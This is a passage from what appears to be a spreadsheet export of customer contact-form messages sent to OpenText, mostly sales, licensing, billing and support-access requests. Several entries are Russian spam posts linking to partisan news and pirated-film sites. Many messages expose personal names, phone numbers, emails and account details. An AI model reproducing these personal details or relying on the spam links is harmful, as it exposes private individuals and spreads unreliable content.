•	Content Publishing – Publish templates and standardized content to a variety of communications channels (e.g., websites, mobile technologies, emails)._x000D_
•	Content Versioning – Retain version history of templates and standardized content, provide rollback feature, and produce date-based snapshot._x000D_
•	Content Storage – Capability for templates and standardized content to be checked in/out, indexed, stored, and exported out of a central location._x000D_
Document management _x000D_
•	Upload, Store, Retrieve, Export – Ability to upload, store, retrieve, export, print documents, including multimedia files in to the system._x000D_
•	Adding Comments – Ability to add comments (including private comments), notes to the documents with the ability to track user activity_x000D_
•	Search Capability – Ability to search for documents using document title/name, keywords, metadata tags, owner name, etc._x000D_
•	Create and Edit Documents from Templates – Ability for staff to create and edit documents (e.g. Word, In Design etc.) from a template._x000D_
•	Defining Meta Data Model – Ability to define meta data model for document classification and applying metadata tags / keywords to documents for identification (e.g.  Recording date stamp, user id, version)_x000D_
•	Indexing – Ability for documents and multimedia files to be indexed or classified in a logical manner. This inc</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I hope this message finds you well._x000D_
I am Caroline Desrochers, representing Tata Communications as Legal Business Operations Manager._x000D_
I am reaching out to you today as we are evaluating Litigation Management Tools from the Vendor perspective for our organization. We would like to get more familiar with your product offering._x000D_
A brief summary of our needs and expectations would be: a platform that can help us with the upload/store, track, review, sort one-time and recurring litigious issues by adopting litigation cause fields (e.g. bad debt recovery) and form a predictive view of danger spots as well as reporting and analytics. _x000D_
_x000D_
As you might be aware, we operate on an international level with multiple offices around the world thus the implementation would also be international. _x000D_
Here is some more information on Tata Communications:_x000D_
_x000D_
https://www.tatacommunications.com/about/offices/_x000D_
_x000D_
We would be looking at a demo in the next 2-3 weeks. _x000D_
_x000D_
We are looking forward to your quick feed-back._x000D_
Regards,_x000D_
_x000D_
Caroline Desrochers_x000D_
Business Operations Manager- Legal_x000D_
Corporate Legal._x000D_
Tata Communications ( Canada ) LTD._x000D_
1441 Carrie Derick_x000D_
Montreal_x000D_
Quebec—H3C-4S9_x000D_
Canada_x000D_
Direct + 1 514 868-7211 | Mobile +1 514 803-8891 | IP 817211_x000D_
caroline.desrochers@tatacommunications.com_x000D_
https://www.linkedin.com/in/caroline-desrochers-a6b2a19/_x000D_
_x000D_
_x000D_
 _x000D_
 _x000D_
_x000D_
www.tatacommunications.com_x000D_
_x000D_
@tata_comm_x000D_
_x000D_
_x000D_
This e-mail and any attachments are confidential and may be legally privileged or otherwise exempt from disclosure. _x000D_
If you are not the intended recipient, any unauthorized use, dissemination, distribution or reproduction of this message _x000D_
is strictly prohibited. If this e-mail is received in error, please contact Tata Communications at +65 6632 6763 or e-mail_x000D_
its Legal Department, quoting the name of the sender, date and the e-mail address to which it has been sent and then _x000D_
permanently delete it from your system along with any of its attachments._x000D_
_x000D_
For further importa</t>
  </si>
  <si>
    <t>Avoir les prix des licences commerciales des solutions OpenText Analytics et IHUB (BIRT)_x000D_
et savoir la procédure de l'achat de ces licences.</t>
  </si>
  <si>
    <t>2 things:_x000D_
1: how do i view free/remaining licenses on the fax server. 10.6_x000D_
2. please fix my support portal access to open webtickets and view licenses.</t>
  </si>
  <si>
    <t>I would like to test OpenText Solo NFS client to bridge a gap between a NFS environment and a Windows 2016 AD environment.</t>
  </si>
  <si>
    <t>check if UNILIN INDUSTRIES BVBA or MOHAWK INTERNATIONAL SERVICES BVBA has Opentext support contract.  We need access to Opentext support helpdesk.</t>
  </si>
  <si>
    <t>Not able to login knowledge center. NOt able to reset password. getting error while resetting the password. Error - "An Error Occurred updating password "</t>
  </si>
  <si>
    <t>I would like to be added in id site 1003871975</t>
  </si>
  <si>
    <t>Conference series LLC cordially invites all participants across the globe to attend the 5th International Conference on Big Data Analysis and Data Mining (Data Mining 2018) which is going to be held during June 20-21 in Rome, Italy to share the Future Technologies for Knowledge Discoveries in Data" and technology._x000D_
_x000D_
Data Mining 2018 brings together leading scientists, engineers, directors of companies in the field of ‘Big Data’ to exchange information on their latest research progress. The main theme of the conference is “Future Technologies for Knowledge Discoveries in Data" which covers a wide range of critically important sessions. _x000D_
Speaker and Delegate slots are available_x000D_
_x000D_
For more details: https://datamining.conferenceseries.com/</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I manage our partner network here at Workshare, I'm looking to expand our OpexText partner network in EMEA. Which partners would you suggest to work with that are within Legal and in house legal, that both reseller and support OpenText._x000D_
_x000D_
Thanks, _x000D_
Alicia </t>
  </si>
  <si>
    <t xml:space="preserve">We are using the opentext Trading Grid for our online dealings with Aldi superstores. We need to get some changes made to our system and I need to speak to someone in IT support who may be able to help. </t>
  </si>
  <si>
    <t xml:space="preserve">Wir sind auf der Suche nach einem Digital Asset Management-System und an einer Zusammenarbeit sehr interessiert. Bitte nehmen Sie mit uns Kontakt auf zwecks Terminvereinbarung, damit wir Ihr Leistungsspektrum kennenlernen können und entscheiden, ob es auf unsere Bedürfnisse passt. Wir haben bereits in Ihrem Büro in Hannover angerufen. Bisher ist noch kein Rückruf erfolgt. </t>
  </si>
  <si>
    <t>Documentum osaajat, sertifioinnit ja lisenssien ylläpito</t>
  </si>
  <si>
    <t>We would like to evaluate Open Text ECM Solution for our Business._x000D_
Please arrange a call/partner to contact us to discuss further.</t>
  </si>
  <si>
    <t>Hi, we need the invoice About the payment on july, the invoice information should be:_x000D_
_x000D_
BIGUNTEK 2046 SL_x000D_
CALLE GABIRIA 2 PRIMERO F_x000D_
20305 IRUN_x000D_
GIPUZKOA_x000D_
SPAIN_x000D_
B75136218_x000D_
_x000D_
Amount 144 GBP - or better in €uros 169,34€_x000D_
_x000D_
Regards,_x000D_
Andoni</t>
  </si>
  <si>
    <t>[url=http://filslov.ru/filosov.jpg][img]http://filslov.ru/filosov.jpg[/img][/url] _x000D_
Только у меня бывает что иногда просыпаются филосовские мысли? Вы о чём-нибудь таком вы думаете?</t>
  </si>
  <si>
    <t>I would like to know who to contact or where I can apply for any of your internships. Thank you.</t>
  </si>
  <si>
    <t>Здравствуйте! Класный у вас сайт! _x000D_
Что скажете по поводу этих новостей? _x000D_
http://techrize.ru/news/25281-ryazhenyy-demokrat-plahotnyuk-ne-ostavlyaet-zapadu-vybora.html [b] Ряженый демократ Плахотнюк не оставляет Западу выбора [/b] _x000D_
[url=http://techrize.ru/news/13003-v-zdanie-harkovskogo-gorsoveta-vrezalsya-avtomobil.html] В здание харьковского горсовета врезался автомобиль [/url] _x000D_
http://techrize.ru/news/26601-uprochaya-kolco-vragov-uspehi-vneshney-politiki-ssha-russkaya-vesna.html _x000D_
http://techrize.ru/politika/21597-v-genshtabe-nedoocenili-potencial-sistemy-pro-ssha.html _x000D_
Ещё много интересного по теме нашел тут: [b] Новости политики Новороссия [/b] [url="http://techrize.ru/"] уплата налогов в днр [/url]</t>
  </si>
  <si>
    <t>Looking for a fax solution.</t>
  </si>
  <si>
    <t>I have a customer who is interested in your product.  Call me at 3149438099 for details_x000D_
opentext business Intelligence</t>
  </si>
  <si>
    <t>Dashboard software pricing inquiry</t>
  </si>
  <si>
    <t>Atualmente o Itaú tem um contrato de VAN com a Opentext  para pagamento/cobrança da Mead Johnson. O Itaú nos informou que não será mais responsável por esse contrato. Sendo assim, necessito conversar com vocês!_x000D_
Obrigada</t>
  </si>
  <si>
    <t>Create an account for Kohl's GXS Catalogue</t>
  </si>
  <si>
    <t xml:space="preserve">how much is the OpenText Media Management script regards </t>
  </si>
  <si>
    <t>We are looking for a solution to allow one of our clients to send faxes on demand. We are a custom software shop and provide a case management solution for a client here in OKC. It is a web-based application, running IIS on a Windows Server. We need to be able to have IIS (or a Windows service) send the faxes from a PDF file on-demand (triggered from the web front-end). Also, the cloud is not an option. Our client wants a one-time cost (either for an appliance, or for a piece of software). They are also concerned about HIPPA compliance. Can you provide a solution, either through software alone, or through an appliance?</t>
  </si>
  <si>
    <t xml:space="preserve">Cancel  Account . Please cancel the following EasyLink Accounts (previously cancelled on-line but still receiving invoices) University Cooperative Society – Account # WVDA148122 University Co-op East – Account # W401051113_x000D_
_x000D_
Please cancel and send confirmation. We have cancelled online and sent emails but continue to get statements. Please cancel this and send confirmation and cease sending statements. </t>
  </si>
  <si>
    <t>I am trying to get the Free Brava Reader program but when I fill out our information I never get the email for the installer. Can you please send this to me? I have checked our spam filter and it is not blocking anything from opentext.</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in a Demo to understand more about some of the analytic software. </t>
  </si>
  <si>
    <t>Need to speak to a sales rep for license renewals</t>
  </si>
  <si>
    <t>Hello. We've been having a problem with FirstClass and Microsoft Office's Send to Email option since Windows 10. With FirstClass registered properly as the default email client, we still get an 'Unspecified MAPI error'. _x000D_
_x000D_
With FirstClass already open, it opens a new login window, and then we get an unspecified MAPI error from any Microsoft Office product. Thanks for any insight you can provide. I am running the latest version of FirstClass from the website.</t>
  </si>
  <si>
    <t xml:space="preserve">We are under the impression that our current version 7 of VIM will not be supported after 12/31/2017.  We need confirmation of such! </t>
  </si>
  <si>
    <t>Please contact me to discuss getting a price quote for RightFax. (my 2nd request).</t>
  </si>
  <si>
    <t>ERRO AO TENTAR USAR A AREA DE TRABALHO DO VIM (OPEN TEXT - /OPT/VIM-WP</t>
  </si>
  <si>
    <t>We have not yet received an invoice for our annual PixTools license renewal. Deadline is 10/26/17.</t>
  </si>
  <si>
    <t>Interested in pricing and use of TeleForms for survey collection</t>
  </si>
  <si>
    <t>Information on purchasing and support for the Brava image only software for $49 per license. I also need to know if automatic software updates for paid software will continue after the required one year maintenance has expired. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">looking for a good projects fro my company _x000D_
i running a software and mobile app development company in india _x000D_
we looking for more mnc projects so that please help us to improve </t>
  </si>
  <si>
    <t>Recently we started installing VIPDocView v8.11 on the newer OPtiplex Desktops and it will not run.   You will see a file called Spy32.exe which will keep opening in the system processes.     However, it will not even open the login screen.   We tested the app on the older Dell optiplex running a gen 3 i5 processor and works just fine.   BOth are running Windows 7 Enterprise.   Is there a patch needed for VIP Docview 8.11 for newer hardware?</t>
  </si>
  <si>
    <t>We are looking for support to upgrade OpenText LiveLink 9.7.1 to Content Server 16 for our customer based in US.</t>
  </si>
  <si>
    <t>please contact me ASAP, as i would like to include Opentext in our evaluation process for a new WCM system.  we are currently reviewing demos for vendor products.</t>
  </si>
  <si>
    <t>Hi there, would it be possible to purchase your previous domain name: hummingbird.com?</t>
  </si>
  <si>
    <t>We are talking about an expansion and the new clinics would get minimum support.</t>
  </si>
  <si>
    <t>can have the detailes of hiring process and when will conduct drives for b.tech 2018 passed outs and is 70% aggregate is necessary in b.tech.</t>
  </si>
  <si>
    <t xml:space="preserve">We use your Recostar 7.7 OCR toolkit in our product. Many clients have been asking us when designing forms for processing which fonts to use that are best optimized for Recostar. Can you provide a list of optimized fonts you recommend that will produce the best results with your OCR engine Recostar 7.7? </t>
  </si>
  <si>
    <t>Would like more information including pricing on the OT Automated Output Accessibility Solution</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a Fax appliance or software that can be used by our customer for sending and receiving Faxes from a Windows desktop or perhaps integrated into our system software. I had read up on your RightFax Express and believe this may be a contender. </t>
  </si>
  <si>
    <t>I am requesting the Beta version connector for the Xerox VersaLink product. I have a customer (Arizona Department of Transportation) who recently upgraded to the Versalink product and RightFax no longer working. We need to get this working fro them ASAP. _x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team - I am from Bank of America,  Created new Open text account today, want to tag my user account with the user code  EU0011593(Act Name:  Bank of America) which will help us to support and reach team for any concerns we facing going forward.  Please Help to get all the needed access which helps us to support our Application.  Please let me know for any additional details. </t>
  </si>
  <si>
    <t>Fax/Email solution and Forms Design tool to be used across multi-platforms. Currently running ERP on the IBM AS400 and planning to move to Microsoft and SAP. Using Computer Keyes Fax and Email solution to send spool files from the AS400 to our customers and ICS FormsPrint design tool used to print AP checks.</t>
  </si>
  <si>
    <t>Looking for cost estimates to stand up an ECM solution to capture documents that need to be archived.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I have paid the money for the full version of Brava Reader Desktop version yesterday.  I did not get key number for license.  Please, email asap.   Order IGS-183362 </t>
  </si>
  <si>
    <t>Hello Open Text Canada!_x000D_
_x000D_
Good Day! _x000D_
We are VR Vision Inc. We noticed that your company viewed our website www.vrvision.ca recently. We are a Toronto-based Virtual Reality Events Company providing (MOBILE VR Technology) for Corporate Events, etc. _x000D_
_x000D_
We are just wondering, do you have any upcoming Events? We would love to provide you and your team a complimentary onsite demo to experience the wonders of Virtual Reality!_x000D_
_x000D_
Let me know and i'll be happy to assist! _x000D_
Have an awesome day!_x000D_
_x000D_
-Joannah</t>
  </si>
  <si>
    <t xml:space="preserve">Needing assistance with installing application via Windows Deployment Services. </t>
  </si>
  <si>
    <t>Good morning. I am trying to get a renewal quote for our eRoom software which was originally purchased from EMC. I reached out to Dell EMC and was told that the eRoom solution was purchased by opentext. Could someone contact me to discuss the status of this product and if a renewal quote is even an option please? Thank you.</t>
  </si>
  <si>
    <t>You support site does not recognize DND - again !  We can't login, again._x000D_
Please fix asap._x000D_
_x000D_
Thnx,_x000D_
Nikita</t>
  </si>
  <si>
    <t>Current user of LearnFlex - need to talk to someone about our current instance at the CNSC and ease to create fixes to meet business needs.  Thanks R</t>
  </si>
  <si>
    <t>Interested in STP products.  Please email me to set up a time to speak.</t>
  </si>
  <si>
    <t>I am with Canvas Jewelry. I need assistance in accessing STAGE Accounts Payable information such as remittance details and payment history. I do not have access to the Trading Grid portal.</t>
  </si>
  <si>
    <t>Looking at ECM solutions for a number of departments at the University</t>
  </si>
  <si>
    <t xml:space="preserve">I requested the Free Brava! Reader yesterday and it said to check my email. I still have not received it. I have checked my SPAM folder and it isn't being blocked by my email server. </t>
  </si>
  <si>
    <t>Difficulty finding what I need on website.  I am unable to find the support life cycle for Captiva/InputAccel and need it for planning purposes.  Specifically looking for date for end of support for Captiva version 7.1  This website is not very intuitive for this type of inquiry.  Search results brought back totally unrelated results.</t>
  </si>
  <si>
    <t>More Information about Opentext and suppliers in Spain/EU</t>
  </si>
  <si>
    <t>Invoice amount changed without notice</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, _x000D_
I was referred to OpenText by a consultant at BDMK. _x000D_
_x000D_
I wanted to inquire about your Records management trainings, specifically for GCDOCS. _x000D_
_x000D_
I am looking for a Records Management course (knowledge and tools for working with GCDOCS/Content Servers) and then a GCDOCS fundamentals course for about 4 people. _x000D_
I am also looking for a Web reporting course for 1-2 people. _x000D_
_x000D_
I'd appreciate if you could provide me with a quote/dates/timings...etc. _x000D_
_x000D_
Please also provide me with a quote if you can travel to us at 140 Prom. Du Portage in Gatineau or if they have to come to your office. _x000D_
_x000D_
Thank you in advance, _x000D_
</t>
  </si>
  <si>
    <t>need reseller prices.</t>
  </si>
  <si>
    <t>Need to check capabalities of OpenText Brava after integrating with filenet.</t>
  </si>
  <si>
    <t xml:space="preserve">We're looking for a system to store and display documentation (procedures and descriptions) generated by system owners for operators to use. Would be good to discuss what options you can offer. </t>
  </si>
  <si>
    <t>To know more about the automated redaction software</t>
  </si>
  <si>
    <t>technical question, but when I click on "create ticket" it does not work. We always had a support contract.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello and Good Day_x000D_
_x000D_
I am Max Alias jitesh,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Max Alias Jitesh_x000D_
</t>
  </si>
  <si>
    <t>Topicus, Holland's #1 mortgage IT services-provider (&gt;70% of Dutch mortages pass our systems), supplying Tier-A Dutch banks their mortgages processing, are interested in further automating the processing of incoming mortgage application documents. We are interested in auto key/value pair recognition on fuzzy formatted documents such as payment slips, collateral valuation reports and insurance policies without the need for extensive templating. If you have such technology we'd like to get in touch. Regards</t>
  </si>
  <si>
    <t>We already have support contract with opentext for the JohnDeere. Inorder to create the support ticket for our issues.</t>
  </si>
  <si>
    <t>We would like to know about Opentext powerdocs appexchange product and Request a demo for our document generation  use case.</t>
  </si>
  <si>
    <t>Looking at pricing of the RightFax server solution to connect into our onsite ShoreTel SIP phone system.</t>
  </si>
  <si>
    <t xml:space="preserve">Researching possible solutions for improving customer experience using omnichannel communications. Not sure if this is Extream or other Customer Communication Management solutions. </t>
  </si>
  <si>
    <t>need license key for older copy of gupta reports builder 2005</t>
  </si>
  <si>
    <t>Need to obtain a price quote for OpenText RightFax products.</t>
  </si>
  <si>
    <t>A user has asked if she can load the ODBC driver for Alchemy. We are running version 9. Can you show me how I can either load it from my current installation or download it from support?</t>
  </si>
  <si>
    <t>Looking for a quote for 15 licences of the OpenText Email Filing eDOCS Edition client.</t>
  </si>
  <si>
    <t xml:space="preserve">I'd like to schedule a call with our Director, Marketing Operations to discuss our needs a bit more to see if OpenText could be a good solution. </t>
  </si>
  <si>
    <t>Can I get a schedule that extends past 11/2017 for the 3-0126 System and Search Administration training class? or any Archive Server (v10.5) training schedules after 11/2017?_x000D_
_x000D_
Thanks,_x000D_
Annette Maynard</t>
  </si>
  <si>
    <t>I have a charge on my credit card statement for XPedite Services.  I'd like to have this charge removed and refunded, please._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Cotação de EDI para automatizar processos financeiros para envio da Folha de Pagamento</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Opentext Team,_x000D_
_x000D_
I would like to place an inquiry on behalf of Deutsche Post DHL Group. We are currently exploring different options to conduct records management for our group and your solution attracted our attention._x000D_
_x000D_
As next steps for us, we would like to better understand the capabilities that you offer, as follows_x000D_
•	Confirmation that your solution is able to provide the following features_x000D_
−	Manual  and automated categorization of records, incl. email, iShare_x000D_
−	Automatic life cycle for different record categories_x000D_
−	Active or trigger button to pause the life cycle countdown_x000D_
−	A dashboard where administrators can monitor the behavior of user_x000D_
−	Any other feature that may be useful, e.g. categorization capability on mobile devices_x000D_
•	Scalability – Are there any type of restrictions for your solution, e.g. number of users?_x000D_
•	Price _x000D_
•	Demo -  Could you provide us with any live demo or any document describing solution and features more in detail?_x000D_
_x000D_
In addition to this, we would be available for a short call to discuss this in case you have any additional questions._x000D_
_x000D_
We would really appreciate if you could get back to us with an answer by the end of this week._x000D_
_x000D_
Thanks in advance for your attention and look forward to talking to you soon!_x000D_
_x000D_
Best,_x000D_
_x000D_
Patrick_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Cannot get the Configuration to change the printer type from Windows to rightfax </t>
  </si>
  <si>
    <t>I am contacting you to research an uncashed check that is cut to Easylink Services Corporation. We are getting ready to escheat the unclaimed check to the State of NJ and wanted to contact someone in the AR department who can research/claim the item. Check # is 2004753333 and it is actually processed by MeadWest Waco before it was acquired by WestRock. Please contact me as soon as you can. Thanks Kamelya</t>
  </si>
  <si>
    <t>Good Afternoon, i am writing this to ask about case 360 support of java 1.8 or 1.9_x000D_
and i am also curious about migrating from case360/websphere/db2(current) --&gt; case360/jboss/db2_x000D_
or even possibly migrating our case360/websphere/db2 --&gt; case360/jboss/sql server (would be our best case scenario)_x000D_
per the install guide we saw it mentioned jdk 1.7 but we would like to be on a newer version if possible._x000D_
_x000D_
Thanks_x000D_
-William</t>
  </si>
  <si>
    <t>RDC currently has an account to utilize your services; however, I am a new staff member and would like to set up a new account with an affiliate business QCP (Quality Care Pharmacies) which is powered by RDC.  Basically I need fax blast and email blast capabilities and am hoping I can upload my lists and documents to your web or cloud service for immediate distribution when needed. Can you help me with these needs and at what cost?  Priced per page, per number or email address?  Thank you, Marian Ross</t>
  </si>
  <si>
    <t>Привет всем! Класный у вас сайт! _x000D_
Что скажете по поводу этих новостей? _x000D_
http://firstnewz.ru/news/7828-svodka-o-sobytiyah-v-sirii-za-26-avgusta-2014-goda.html [b] Сводка о событиях в Сирии за 26 августа 2014 года [/b] _x000D_
[url=http://firstnewz.ru/news/10577-nablyudateli-obse-rasskazali-o-vzryve-v-harkove.html] Наблюдатели ОБСЕ рассказали о взрыве в Харькове [/url] _x000D_
http://firstnewz.ru/news/7454-spisok-nehoroshih-resursov-dlya-ukrofashistov-kak-serpom-po-vsem-podrobnostyam.html _x000D_
http://firstnewz.ru/news/5683-yakutskenergo-otsudilo-u-neplatelschikov-bolee-18-mln-rub.html _x000D_
Ещё тут много интересного: [b] новости с фронтов новороссии сегодня http://firstnewz.ru/</t>
  </si>
  <si>
    <t>Gostaria de detalhes para os serviços de VAN  (PAGAMENTOS / COBRANÇA / EXTRATO ) de vocês.</t>
  </si>
  <si>
    <t>In need of sales support for an opportunity - local Government account (County) in North Dakota.</t>
  </si>
  <si>
    <t>We are looking to upgrade from 10.5 to 10.6 and replacing the gateway. We are also interested in possibly replacing everything and going to Release 16. Would you please send me a quote for both.  Thank you</t>
  </si>
  <si>
    <t>Hello Open Text team,_x000D_
Just requested access to support page due we have 4 kazeon instalations in place, "FC6KZ153800004", i got the confirmation mail regarding i was granted with access to support , i followed the proveided link , but support link is still disabled on my account._x000D_
With the follow message, could you please help me to enable support access on my account?_x000D_
Thanks!_x000D_
MArtin_x000D_
"No Access_x000D_
_x000D_
We're sorry, your account does not grant you access to this resource._x000D_
_x000D_
Almost there!_x000D_
_x000D_
Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
Please click on the link below to complete the process"</t>
  </si>
  <si>
    <t>We would like to see a demo of eDocs for a possible DMS for our law firm.</t>
  </si>
  <si>
    <t>I am researching contract management system platforms to integrate with one or more of our current applications (Onits, Matter Management and Oracle ERP).  I would like a general overview of OpenText eDocs, its functional capabilities to serve as a document repository for Dexcom's various contractual and legal records.  Thank you!  Todd</t>
  </si>
  <si>
    <t>I would like to schedule a demonstration of an ECM/DMS tool.</t>
  </si>
  <si>
    <t xml:space="preserve">Exploring a digital and cost effective solution for faxing needs. </t>
  </si>
  <si>
    <t>I am wondering if Redact-It will have an upgrade soon or will the work of Redact-It be transferred to Brava or one of your other programs._x000D_
_x000D_
We are running Redact-It 2.3 and have been for approximately a year and one half._x000D_
I want to make sure we stay updated on the program._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I was looking for some pricing information for TeleForm? Please can you tell me how much it costs?</t>
  </si>
  <si>
    <t>Can't reset password, continues to fail, can't logon to support site</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
_x000D_
I work with a provider of high quality Call Center leads. These are qualified leads, which are businesses that need multi-seat call center service. We produce them daily, and they are vetted for your specifications. _x000D_
_x000D_
Would you be open to receiving a quote on Call Center leads?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Regards,_x000D_
Elle Michael_x000D_
_x000D_
We respect your privacy and want to make sure you are aware of a few things. By replying to this email, you authorize Web Leads, Inc and our affiliates that can help with your project to call you at the number you provided, and you understand that they may use automated phone technology to call you. At no time are you required to make a purchase. If you are no longer interested in receiving messages or feel you are receiving this message in error,  click here to unsubscribe</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
Would you be interested in acquiring list of Alcatel users?_x000D_
_x000D_
We have over 15,000 records for Alcatel users and all these records contain complete business contact information like company name, company website address, contact name, title, email address, phone number, fax number, physical address, number of employees, revenue size. SIC Code and technology used._x000D_
_x000D_
Feel free to let me know your thoughts on the same._x000D_
_x000D_
Thanks and Regards_x000D_
Sonia White_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to go paperless with our 48+ hotels and corporate office with document management capabilities including document retention program. </t>
  </si>
  <si>
    <t>Seeking more information on Capture Center capabilities</t>
  </si>
  <si>
    <t>Hello we are interested in Documentum . Could you please send us more information about the software or better yet can you send a sales representative to our Plant located in Queretaro?</t>
  </si>
  <si>
    <t>We have Autonomy Process Automation 7.4.  Need information on if it will be compatible with iManage Work 10.</t>
  </si>
  <si>
    <t>For intetnships</t>
  </si>
  <si>
    <t xml:space="preserve">We used to have licenses of Keyfile managed and maintenance until end of 2008 by Spanish company Suricata. Now I believe this application is called Global 360  and would like to know if an update former Keyfile is possible and a first estimated cost._x000D_
Thanks_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Привет всем участникам! класный у вас сайт! _x000D_
Зацените, нашёл супер базу кино онлайн в хорошем качестве: [b] Список сериалов [/b] [url=http://kinofanonline.ru/]http://kinofanonline.ru/[/url] _x000D_
Тут: [b] 2017 в хорошем качестве лучшие мелодрамы [/b] http://kinofanonline.ru/melodrama/ _x000D_
[url=http://kinofanonline.ru/komediya/] лучшие комедии 2017 бесплатно [/url] _x000D_
http://kinofanonline.ru/sport/1996 [b] Рейтинг Спорт 1996 - Список лучших кинофильмов смотреть онлайн [/b] _x000D_
[url=http://kinofanonline.ru/muzykalnye/2015] Рейтинг Музыкальные 2015 - Список лучших кинофильмов смотреть онлайн [/url] _x000D_
http://kinofanonline.ru/melodrama/2012 _x000D_
[url=http://kinofanonline.ru/komediya/2274-soobschestvo-community-sezon-1-5-2009-2014.html] Смотреть Сообщество / Community (Сезон 1-5) (2009-2014) онлайн бесплатно [/url] _x000D_
http://kinofanonline.ru/triller/540-krov-blood-2012.html [b] Смотреть Кровь / Blood (2012) онлайн бесплатно [/b] _x000D_
http://kinofanonline.ru/fantastika/ _x000D_
и Тут: http://kinofanonline.ru/melodrama/935-pismo-neznakomki-lettre-dune-inconnue-2001.html</t>
  </si>
  <si>
    <t>Currently we use onbase for our document management software. It's very expensive and not available like the cloud services are. Can I get information on Open Text for a Law Firm, and does it integrate with Needles?</t>
  </si>
  <si>
    <t>I am not able to access for whirlpool support tickets. Please provide the access. I was able to access in EMC previously.</t>
  </si>
  <si>
    <t>Exploring this solution to upgrade currently used workflow software which is leagcy and hetrogeneous</t>
  </si>
  <si>
    <t>We received a wire on April 5th from OpenText that we have no information for.  Could you please put me in touch with your Accounts Payable department?</t>
  </si>
  <si>
    <t>Good morning, I am requesting a call back from Consultancy Service team as I have already provided signed SOW_PLI006 and Purchase Order from my company. I have tried to contact by phone and email Philip Day but not hear from him since the 26th September. Please I need very urgent support. Regards, Gisella Yalle</t>
  </si>
  <si>
    <t>I was enquiring if you have a system which can hold large number of documents/drawings (AutoCAD) (10TB+) with easier uploading, indexing mechanism and very fast searh capabilities along with a review management process (Workflow)? We are intersted to learn. We will appreciate your response.</t>
  </si>
  <si>
    <t>I haven't registered for Opentext for the internship which is held in mallareddy engineering college on 11th Oct. I have a keen intrest in taking a part with your company . Please support me in this aspect_x000D_
Thanking you</t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
The NCOC N.V company is going to pass the «Opentext System and Search Administration» training course for Duman Sarin on 13-17 November in Munich, Germany through our company._x000D_
_x000D_
_x000D_
Kindly ask you to write a condition of carrying out this course, payment details and send the contract for consideration._x000D_
_x000D_
_x000D_
Please let me know if you have any questions._x000D_
Elmira</t>
  </si>
  <si>
    <t>We are interested in OpenText Interactive Viewer , can anyone please get in touch with us.</t>
  </si>
  <si>
    <t>Need fax to email solution please call asap.</t>
  </si>
  <si>
    <t>SECOND REQUEST. THIS IS TO FOLLOW UP REQUEST DATED 10/5/17. URGENT, THESE LICENSES WILL EXPIRE ON 11/4/17 AND THEY ARE USED IN THE CLASSROOM.   Please provide quote for 30 licenses for EnCase forensic SMS and 30 dongles before 10/11/17 to start purchase order process for servIce period 11/4/2017 through 11/3/2019. This will be for the College of Business Administration- Cal Poly Pomona University.  Prior contract was with Guidance Software.  Our Guidance Software customer number was 15332,order/contract number RR000000010143.  Thank you.</t>
  </si>
  <si>
    <t>I have been getting calls non stop to my business phone from these numbers. Please take my number off the call list. I have already submitted a request last month to block my numbers and I received an email back saying that it was done but now again this month I am getting calls incessantly. I need this to stop ASAP. I am trying to conduct business and every two minutes I am being interrupted with a call from one of your numbers. I went to www.opentext.com/block and nothing came up for me to block my number again so that is why I am contacting you. Please block my number: (708)956-7701. Thank you</t>
  </si>
  <si>
    <t>Looking for pricing on your OpenText product.  I tried calling but received a machine that wants to call me back.  I am not always available to talk.  Can you please email me pricing?_x000D_
Thanks, Karla</t>
  </si>
  <si>
    <t>Online Support Resources available through My Support._x000D_
I have finished the registration but the site indicates that I do not have access.</t>
  </si>
  <si>
    <t>Selecting electronic document management product for Human Resources.  Request conversation and demonstration, please.</t>
  </si>
  <si>
    <t>Looking for information on your ECM product as a possible replacement for our current platform. Mostly for the inranet. Needs to have a strong CMS with some "social" capabilities built-in (Q&amp;A, suggestions/crowdsourcing, likes and comments). Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">I am leading a project to implement a contract management solution, and I would like to learn more about how you could meet our needs.  </t>
  </si>
  <si>
    <t>We are looking for OCR solution for Insurance industry, mainly for incoming claim forms, documentary evidence and provider invoices._x000D_
Thank you_x000D_
BR,_x000D_
Arevik Ovsepyan</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in information about Fax2Mail, looking to move from On premise to Cloud Fax service. </t>
  </si>
  <si>
    <t>Would like to acquire more information on redactit</t>
  </si>
  <si>
    <t>Good evening,_x000D_
I need to understand how can I open our company account that was already opened on EMC service support._x000D_
My access to download center https://emc.flexnetoperations.com was: mauro.bufano@bnpparibas.com_x000D_
My access to https://emc.subscribenet.com was mauro .bufano@bnlmail.com_x000D_
Thank you very much_x000D_
Best regards_x000D_
Mauro</t>
  </si>
  <si>
    <t>Transitioning a customer over to our Xerox VersaLink product and they require the RightFax EIP App to be installed. _x000D_
1) Will your APP work with the new Versalink Product line? _x000D_
2) How soon before we see the new Xerox product lines on the list of supported devices?</t>
  </si>
  <si>
    <t>Wonder if you could provide the licensing model / cost for your record management in the Cloud and can be integrated with SharePoint. Also, wonder if your product can be integrated with Microsoft Dynamics.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madame: _x000D_
My name is Amanda with CARCO Group Inc We are a professional fact finding organization, which represents a number of major corporations. One of our clients has requested to verify employment with your company. Your cooperation in furnishing a prompt reply will be greatly appreciated. Thank you for your assistance in this matter. _x000D_
Kind Regards, _x000D_
Amanda Mclaughlin _x000D_
